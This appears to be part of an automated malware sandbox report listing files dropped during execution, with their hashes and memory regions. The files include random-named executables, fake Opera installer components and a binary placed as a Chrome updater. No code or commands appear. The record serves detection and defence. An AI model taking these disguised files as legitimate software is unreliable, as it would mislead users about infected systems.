SHA512 4fd5e4dabca324c442a4f9566d69823cf71573001460901c912f42450ace209a35737e22e25e77611e728c2c59224aa2558b70ea50e6ae3cdf2c4246fdab1923

memory/4992-163-0x0000000000400000-0x0000000000965000-memory.dmp

C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe

MD5 7d4b677be7d62f98fd161a9dac97941e
SHA1 112f4030f205cfbffa6c1fe0b2e74f62f572a844
SHA256 e7d1b66b70af1e4408c197bbff2082873265d468f4aedc3c3c336fd635b47ca1
SHA512 81922a9f12635cb85131a63510b9b43a548eb322bca555617c76926829123535402ebb77359b8c6964b45638545d5937d5663e82407f4c656895ea2e210592f9

memory/4776-171-0x00007FF7A4860000-0x00007FF7A4E01000-memory.dmp

C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe

MD5 6adbe8c1f705afaf91d59f32de9fa981
SHA1 6af94d5829f6469f32d36ae852701acb800cb33e
SHA256 4145304d995415d5e3047c189a8339b65b4a0af2f2f9680f6eafd956ac55a2ff
SHA512 7cbfe87a43f859ebaafb7d4833e53fabd6b542491feb04eb9798aa69a3c91313d3280f286aeaff89bd9b6bb256841ad27c5609bdec5540744d5f24df00f386a5

C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe

MD5 6d3fc2f2abab017258985e5b32fb07ef
SHA1 1f686bfb1b6f83dc70a6c6af343053d186198222
SHA256 47eb746cecc1f58ff38d9b4e6c1647752418e5fa0abecd9bcb89ed7ad0e189d0
SHA512 4fd5e4dabca324c442a4f9566d69823cf71573001460901c912f42450ace209a35737e22e25e77611e728c2c59224aa2558b70ea50e6ae3cdf2c4246fdab1923

C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe

MD5 6adbe8c1f705afaf91d59f32de9fa981
SHA1 6af94d5829f6469f32d36ae852701acb800cb33e
SHA256 4145304d995415d5e3047c189a8339b65b4a0af2f2f9680f6eafd956ac55a2ff
SHA512 7cbfe87a43f859ebaafb7d4833e53fabd6b542491feb04eb9798aa69a3c91313d3280f286aeaff89bd9b6bb256841ad27c5609bdec5540744d5f24df00f386a5

memory/4148-179-0x0000000000830000-0x0000000000D59000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2311212252463872744.dll

MD5 161c755621aa80426d48315d27bc8daa
SHA1 c17fed1e315395b38474842d3353663066b250c5
SHA256 6a17694a9428cb7ebcf1b7803e236ab76a557d4c041a5f7f229d6bab87b2c89b
SHA512 5dba00756f973ecddd0994c4af9779f26aec7f8f2b4f890532fba3cbb0a1e37fbc791bf8fbca047c4f3dbaa984ae78e2d4623686b83e6387741db959d36c22bf

memory/3160-186-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe

MD5 7d4b677be7d62f98fd161a9dac97941e
SHA1 112f4030f205cfbffa6c1fe0b2e74f62f572a844
SHA256 e7d1b66b70af1e4408c197bbff2082873265d468f4aedc3c3c336fd635b47ca1
SHA512 81922a9f12635cb85131a63510b9b43a548eb322bca555617c76926829123535402ebb77359b8c6964b45638545d5937d5663e82407f4c656895ea2e210592f9

memory/3192-167-0x0000000003490000-0x00000000034A6000-memory.dmp

memory/2276-172-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe

MD5 6d3fc2f2abab017258985e5b32fb07ef
SHA1 1f686bfb1b6f83dc70a6c6af343053d186198222
SHA256 47eb746cecc1f58ff38d9b4e6c1647752418e5fa0abecd9bcb89ed7ad0e189d0
SHA512 4fd5e4dabca324c442a4f9566d69823cf71573001460901c912f42450ace209a35737e22e25e77611e728c2c59224aa2558b70ea50e6ae3cdf2c4246fdab1923

memory/3160-194-0x00007FFCE3B90000-0x00007FFCE3B92000-memory.dmp

memory/2744-187-0x0000000000830000-0x0000000000D59000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2311212252453714148.dll

MD5 161c755621aa80426d48315d27bc8daa
SHA1 c17fed1e315395b38474842d3353663066b250c5
SHA256 6a17694a9428cb7ebcf1b7803e236ab76a557d4c041a5f7f229d6bab87b2c89b
SHA512 5dba00756f973ecddd0994c4af9779f26aec7f8f2b4f890532fba3cbb0a1e37fbc791bf8fbca047c4f3dbaa984ae78e2d4623686b83e6387741db959d36c22bf

memory/3160-197-0x00007FFCE27B0000-0x00007FFCE27B2000-memory.dmp

memory/3160-195-0x00007FFCE3BA0000-0x00007FFCE3BA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\GlPeykXYgfNELRIuXGtYZznP.exe

MD5 6d3fc2f2abab017258985e5b32fb07ef
SHA1 1f686bfb1b6f83dc70a6c6af343053d186198222
SHA256 47eb746cecc1f58ff38d9b4e6c1647752418e5fa0abecd9bcb89ed7ad0e189d0
SHA512 4fd5e4dabca324c442a4f9566d69823cf71573001460901c912f42450ace209a35737e22e25e77611e728c2c59224aa2558b70ea50e6ae3cdf2c4246fdab1923

memory/3160-198-0x00007FFCE27C0000-0x00007FFCE27C2000-memory.dmp

memory/3160-200-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

memory/3160-199-0x00007FFCE18A0000-0x00007FFCE18A2000-memory.dmp

memory/3160-207-0x00007FFCE18B0000-0x00007FFCE18B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2311212252508714144.dll

MD5 161c755621aa80426d48315d27bc8daa
SHA1 c17fed1e315395b38474842d3353663066b250c5
SHA256 6a17694a9428cb7ebcf1b7803e236ab76a557d4c041a5f7f229d6bab87b2c89b
SHA512 5dba00756f973ecddd0994c4af9779f26aec7f8f2b4f890532fba3cbb0a1e37fbc791bf8fbca047c4f3dbaa984ae78e2d4623686b83e6387741db959d36c22bf

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2311212252508714144.dll

MD5 161c755621aa80426d48315d27bc8daa
SHA1 c17fed1e315395b38474842d3353663066b250c5
SHA256 6a17694a9428cb7ebcf1b7803e236ab76a557d4c041a5f7f229d6bab87b2c89b
SHA512 5dba00756f973ecddd0994c4af9779f26aec7f8f2b4f890532fba3cbb0a1e37fbc791bf8fbca047c4f3dbaa984ae78e2d4623686b83e6387741db959d36c22bf

C:\Users\Admin\AppData\Local\Temp\7zS1AF5.tmp\Install.exe

MD5 b2d6071f0c13c212d6a0f7a9f0be0c3a
SHA1 ae6449fb551df26e629c47bf7b40bda9a7082daa
SHA256 be8d38d062dc8c047f32a300dd5b9c9bdc72834407de63c32ecac3cbb553fce2
SHA512 5f83692311b4efd458e9c5282ae29abc5408aa0228cf16080f176252a74544f30881e8468dab3b6d6f778ae3195f194c7e9429f8421ca292c78bb0fb6059c141

C:\Users\Admin\AppData\Local\Temp\7zS1AF5.tmp\Install.exe

MD5 b2d6071f0c13c212d6a0f7a9f0be0c3a
SHA1 ae6449fb551df26e629c47bf7b40bda9a7082daa
SHA256 be8d38d062dc8c047f32a300dd5b9c9bdc72834407de63c32ecac3cbb553fce2
SHA512 5f83692311b4efd458e9c5282ae29abc5408aa0228cf16080f176252a74544f30881e8468dab3b6d6f778ae3195f194c7e9429f8421ca292c78bb0fb6059c141

memory/4144-213-0x0000000000DC0000-0x00000000012E9000-memory.dmp

memory/4992-216-0x0000000002930000-0x0000000002931000-memory.dmp

memory/1976-221-0x0000000004730000-0x0000000004740000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2311212252537305048.dll

MD5 161c755621aa80426d48315d27bc8daa
SHA1 c17fed1e315395b38474842d3353663066b250c5
SHA256 6a17694a9428cb7ebcf1b7803e236ab76a557d4c041a5f7f229d6bab87b2c89b
SHA512 5dba00756f973ecddd0994c4af9779f26aec7f8f2b4f890532fba3cbb0a1e37fbc791bf8fbca047c4f3dbaa984ae78e2d4623686b83e6387741db959d36c22bf

C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe

MD5 6d3fc2f2abab017258985e5b32fb07ef
SHA1 1f686bfb1b6f83dc70a6c6af343053d186198222
SHA256 47eb746cecc1f58ff38d9b4e6c1647752418e5fa0abecd9bcb89ed7ad0e189d0
SHA512 4fd5e4dabca324c442a4f9566d69823cf71573001460901c912f42450ace209a35737e22e25e77611e728c2c59224aa2558b70ea50e6ae3cdf2c4246fdab1923

C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe

MD5 6d3fc2f2abab017258985e5b32fb07ef
SHA1 1f686bfb1b6f83dc70a6c6af343053d186198222
SHA256 47eb746cecc1f58ff38d9b4e6c1647752418e5fa0abecd9bcb89ed7ad0e189d0
SHA512 4fd5e4dabca324c442a4f9566d69823cf71573001460901c912f42450ace209a35737e22e25e77611e728c2c59224aa2558b70ea50e6ae3cdf2c4246fdab1923

memory/5048-229-0x0000000000830000-0x0000000000D59000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2311212252552934936.dll

MD5 161c755621aa80426d48315d27bc8daa
SHA1 c17fed1e315395b38474842d3353663066b250c5
SHA256 6a17694a9428cb7ebcf1b7803e236ab76a557d4c041a5f7f229d6bab87b2c89b
SHA512 5dba00756f973ecddd0994c4af9779f26aec7f8f2b4f890532fba3cbb0a1e37fbc791bf8fbca047c4f3dbaa984ae78e2d4623686b83e6387741db959d36c22bf

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 ca366089eb6c26e2b23804ee1ff6b327
SHA1 754abadca62ba893b7bf04145346608da3940041
SHA256 dcf939772ae07657a109c251a774223e19f17250a62a33f12fc372acb86654c7
SHA512 c2baf9ee3f317d4aae21e1eb34c0c3058f2eb00b9eb24ee4bf9ba1904d3d788a3dba84fa1c6b028ae98405275d760db6e59d42dadd624d800906521027384a86

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 ca366089eb6c26e2b23804ee1ff6b327
SHA1 754abadca62ba893b7bf04145346608da3940041
SHA256 dcf939772ae07657a109c251a774223e19f17250a62a33f12fc372acb86654c7
SHA512 c2baf9ee3f317d4aae21e1eb34c0c3058f2eb00b9eb24ee4bf9ba1904d3d788a3dba84fa1c6b028ae98405275d760db6e59d42dadd624d800906521027384a86

memory/3160-240-0x00007FFCE15D0000-0x00007FFCE1899000-memory.dmp

memory/3160-241-0x00007FFCE15D0000-0x00007FFCE1899000-memory.dmp

memory/3160-239-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe

MD5 24a387fda6e0f36f9af44d65487c5f5b
SHA1 a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970
SHA256 b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb
SHA512 f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61

memory/1976-243-0x0000000006C00000-0x0000000006C32000-memory.dmp

memory/1976-247-0x000000006F370000-0x000000006F3BC000-memory.dmp

memory/3160-246-0x00007FFC80030000-0x00007FFC80031000-memory.dmp

memory/3160-245-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

memory/1976-258-0x00000000060D0000-0x00000000060EE000-memory.dmp

memory/4936-248-0x0000000000830000-0x0000000000D59000-memory.dmp

memory/4444-260-0x0000000074A30000-0x00000000751E0000-memory.dmp

memory/3808-262-0x0000000010000000-0x0000000010586000-memory.dmp

memory/3160-259-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

memory/1976-261-0x0000000006E40000-0x0000000006EE3000-memory.dmp

memory/1976-263-0x0000000074A30000-0x00000000751E0000-memory.dmp

memory/3160-266-0x00007FFC80000000-0x00007FFC80002000-memory.dmp

memory/3160-264-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

memory/1976-268-0x000000007EE10000-0x000000007EE20000-memory.dmp

memory/3160-270-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

memory/3808-271-0x0000000000520000-0x0000000000C10000-memory.dmp

memory/4992-274-0x0000000000400000-0x0000000000965000-memory.dmp

memory/1976-276-0x00000000075B0000-0x0000000007C2A000-memory.dmp

memory/1976-277-0x0000000006F80000-0x0000000006F9A000-memory.dmp

memory/3160-273-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

memory/3160-278-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

memory/3160-282-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

memory/3160-286-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

memory/4036-288-0x0000000002980000-0x0000000002D81000-memory.dmp

memory/1976-290-0x0000000007000000-0x000000000700A000-memory.dmp

memory/4036-291-0x0000000002D90000-0x000000000367B000-memory.dmp

memory/4036-299-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/1976-303-0x0000000004730000-0x0000000004740000-memory.dmp

memory/1976-304-0x0000000004730000-0x0000000004740000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 8ef9853d1881c5fe4d681bfb31282a01
SHA1 a05609065520e4b4e553784c566430ad9736f19f
SHA256 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA512 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

memory/3160-305-0x00007FFCE3990000-0x00007FFCE3B85000-memory.dmp

memory/1976-308-0x0000000007200000-0x0000000007296000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe

MD5 24a387fda6e0f36f9af44d65487c5f5b
SHA1 a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970
SHA256 b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb
SHA512 f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61

memory/1464-315-0x000001A9F5AD0000-0x000001A9F5AF2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 ebd8f90406c4820902162e3156b1ecb4
SHA1 f909f010552a1471b7a2417d3a954d92dcf44833
SHA256 414b2bf1e0c76689465539ace0fce226ce6ef8619db64799b2b5c60f78b3cb4b
SHA512 7bfe96a23a31e9d089dbf8e945c9f562aed86377bf22da17f0fd6760d99edb4c85b8cbe5d3eedb31619da90f78382738141b4615a1d6519c0085c6ea5396eb98

memory/1464-335-0x000001A9F5B80000-0x000001A9F5B9C000-memory.dmp

memory/1464-336-0x000001A9F8290000-0x000001A9F8345000-memory.dmp

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

memory/4036-342-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/4776-347-0x00007FF7A4860000-0x00007FF7A4E01000-memory.dmp

memory/3160-348-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\opera_package

MD5 be5e4506abd821bcf03061f2fda2f0f6
SHA1 6f9683dbe26bede970c29badb3e678514864361f
SHA256 e1583c2dfbe506b9d041b9d6f605ce831d0757b7e2c1c3dc22271ae78b7d78dd
SHA512 182f847a3336baa0ac2f1489f79aba4c5ee8df43ba50581c2a8a27d5ad39a3b413714f5fa7d95923e73e95542cc40550e96dd98e04d1c63619760f181d36932e

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 c9e91256d66895b139d1cccf4d06e815
SHA1 8329961df365d7efbeaf0ae7420edd971f824ed7
SHA256 84f0b933f3c63a466becbc6c48f100ef853639c063be4bbefa799b99f8299caf
SHA512 b0592e21828c80bac473e2111b4415f10cb776c572e90a4b0ecf0449b109bff23e6e5577593e908d3b756744848efd638804dbafe887dc589bc1890c93ede017

memory/4036-399-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/4992-400-0x0000000000400000-0x0000000000965000-memory.dmp

memory/4776-401-0x00007FF7A4860000-0x00007FF7A4E01000-memory.dmp

memory/3160-402-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\additional_file0.tmp

MD5 b0f128c3579e6921cfff620179fb9864
SHA1 60e19c987a96182206994ffd509d2849fdb427e3
SHA256 1c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee
SHA512 17977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe

MD5 b0f128c3579e6921cfff620179fb9864
SHA1 60e19c987a96182206994ffd509d2849fdb427e3
SHA256 1c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee
SHA512 17977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe

MD5 b0f128c3579e6921cfff620179fb9864
SHA1 60e19c987a96182206994ffd509d2849fdb427e3
SHA256 1c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee
SHA512 17977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212

memory/4036-424-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2340781530aeec4608eb2e8a23a7db7e
SHA1 25d8755ac1b0d44edc78c7298c461bc5d6a943ef
SHA256 254d07a11e42b083cea30a4edc5b72cbd23f3facaed39df065d85245768bcafd
SHA512 3f85eac9207a45ad32245a62e826478c8fdb236d868f4ae46e1c9f2821bd0562f568be95d1270985efa6847d525fdc65461f47606ebf04a63b166c6756735263

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 124edf3ad57549a6e475f3bc4e6cfe51
SHA1 80f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256 638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512 b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\dbgcore.DLL

MD5 5a6cd2117967ec78e7195b6ee10fc4da
SHA1 72d929eeb50dd58861a1d4cf13902c0b89fadc34
SHA256 a013652c95eca80356040312390d09ed78458fca6a0aef5ce3203dfe9cbc5040
SHA512 07aa64e6c681360c6c6c504041bd97f54dbf0aad8e498281dc8f8bdec2de4fc1c1bed9d0c4d3b6f4a4be19c408f7d34ff1c4a13db36488f698e3ae11855b895c

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\dbgcore.dll

MD5 5a6cd2117967ec78e7195b6ee10fc4da
SHA1 72d929eeb50dd58861a1d4cf13902c0b89fadc34
SHA256 a013652c95eca80356040312390d09ed78458fca6a0aef5ce3203dfe9cbc5040
SHA512 07aa64e6c681360c6c6c504041bd97f54dbf0aad8e498281dc8f8bdec2de4fc1c1bed9d0c4d3b6f4a4be19c408f7d34ff1c4a13db36488f698e3ae11855b895c

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\dbghelp.dll

MD5 861a07bcf2a5cb0dda1aaf6dfcb57b26
SHA1 a0bdbbc398583a7cfdd88624c9ac2da1764e0826
SHA256 7878be3359a3ecfcf94f961bcdce3e6e8bc01a55eba640d45b867b94f30fcdbc
SHA512 062159168817968f1165cb06299217a556c4e6b00ef7c740f845fdcbbaca77da346ef5fd7403c6f9d81e173a2fcf40c63da57cb884158f8c037c0df0ce1cc5b9

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\dbghelp.dll

MD5 861a07bcf2a5cb0dda1aaf6dfcb57b26
SHA1 a0bdbbc398583a7cfdd88624c9ac2da1764e0826
SHA256 7878be3359a3ecfcf94f961bcdce3e6e8bc01a55eba640d45b867b94f30fcdbc
SHA512 062159168817968f1165cb06299217a556c4e6b00ef7c740f845fdcbbaca77da346ef5fd7403c6f9d81e173a2fcf40c63da57cb884158f8c037c0df0ce1cc5b9

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\assistant_installer.exe

MD5 34afbc4605531efdbe6f6ce57f567c0a
SHA1 6cb65f3565e40e7d08f5a0ad37b1b9182b4fc81b
SHA256 0441668bc7daf97c16734a8a95eb29de9fd2f4bec368f4d009e5437862249019
SHA512 577fe412d9b20055cf2f67e029a6829301d6b010cc03d2cf8ce89b87c213530dc4d396a27b92f56ed8260afd59d6fbd8cf841e807460f0a0bad4ad1df5b7c25c

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\dbgcore.dll

MD5 5a6cd2117967ec78e7195b6ee10fc4da
SHA1 72d929eeb50dd58861a1d4cf13902c0b89fadc34
SHA256 a013652c95eca80356040312390d09ed78458fca6a0aef5ce3203dfe9cbc5040
SHA512 07aa64e6c681360c6c6c504041bd97f54dbf0aad8e498281dc8f8bdec2de4fc1c1bed9d0c4d3b6f4a4be19c408f7d34ff1c4a13db36488f698e3ae11855b895c

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\dbghelp.dll

MD5 861a07bcf2a5cb0dda1aaf6dfcb57b26
SHA1 a0bdbbc398583a7cfdd88624c9ac2da1764e0826
SHA256 7878be3359a3ecfcf94f961bcdce3e6e8bc01a55eba640d45b867b94f30fcdbc
SHA512 062159168817968f1165cb06299217a556c4e6b00ef7c740f845fdcbbaca77da346ef5fd7403c6f9d81e173a2fcf40c63da57cb884158f8c037c0df0ce1cc5b9

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\assistant_installer.exe

MD5 34afbc4605531efdbe6f6ce57f567c0a
SHA1 6cb65f3565e40e7d08f5a0ad37b1b9182b4fc81b
SHA256 0441668bc7daf97c16734a8a95eb29de9fd2f4bec368f4d009e5437862249019
SHA512 577fe412d9b20055cf2f67e029a6829301d6b010cc03d2cf8ce89b87c213530dc4d396a27b92f56ed8260afd59d6fbd8cf841e807460f0a0bad4ad1df5b7c25c

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 ca366089eb6c26e2b23804ee1ff6b327
SHA1 754abadca62ba893b7bf04145346608da3940041
SHA256 dcf939772ae07657a109c251a774223e19f17250a62a33f12fc372acb86654c7
SHA512 c2baf9ee3f317d4aae21e1eb34c0c3058f2eb00b9eb24ee4bf9ba1904d3d788a3dba84fa1c6b028ae98405275d760db6e59d42dadd624d800906521027384a86

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fa0a0b2060165963bc78ad831029ad8a
SHA1 49051991104d7aff64f42778d9f4b8ed4410bc35
SHA256 c75e906296544b6c825a45ce616b7ce1137622540d996bfe24838c53fb2f4097
SHA512 d77c78efec2ce98014e1153829a4905ca58f50623301e2e51176fff9645d75e91ae7f2d2bb121180dd0da3d636e9fafef140de035f515308aee6e61268ed0b28

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 ce8d2d5a0aae0d4de7508f90bd5a4102
SHA1 d63d0dee43498221dccb9b2f415bde5fef5ac581
SHA256 8dbd3922fd6b77da7cb67936f6f1c6bd7a877c1f5be984d12f7f9020ebda360f
SHA512 b3a02f7b7dc56cba6b17eebca6183a1b5ecea3c8574256d959c8ac82c9751d9452ec5e9fb89849abdbf896800bb76ce529994caa3118c72dde3a3154bf1a0dd9

C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe

MD5 d373ff7cb6ac28b844d9c90fc8f1ab3f
SHA1 8bd2bd07e929d71f5c27ba7fab3777f29a4c48e3
SHA256 92a53acf35b82eaf96286b8a5dab6cef0513c48dff9e480fa3486033258c093b
SHA512 f89fce3365f1a9091b2523ea310089c53d67469e1d75b1e842eff2d59eb2a42fbbb49f03f3a45f9e56734895add9ac865e9adc1dbc0dfc4b34314b48bb0871a1

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 7fa6b58a405f45136e713376181635a9
SHA1 de2ae0e895397208f73b69c8df27db80c4f2ee6e
SHA256 a90e472c958489debe0541426b5178f0953675c4ac595642b90256bdb2c51a25
SHA512 0a85b879179ed4500e9b57882bf7bb30a4c86d127c9e1cc4782704fc5cde7410a5084751c15bb68cd0b4ab677f51495036dfa77eca3d451513b73f93a2390bbb

C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe

C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe

C:\Windows\Temp\VeitDxgWDfCRoOtN\JREGxNGCKgjMZve\xcZvMbu.exe

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3zxqty5.default-release\prefs.js

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
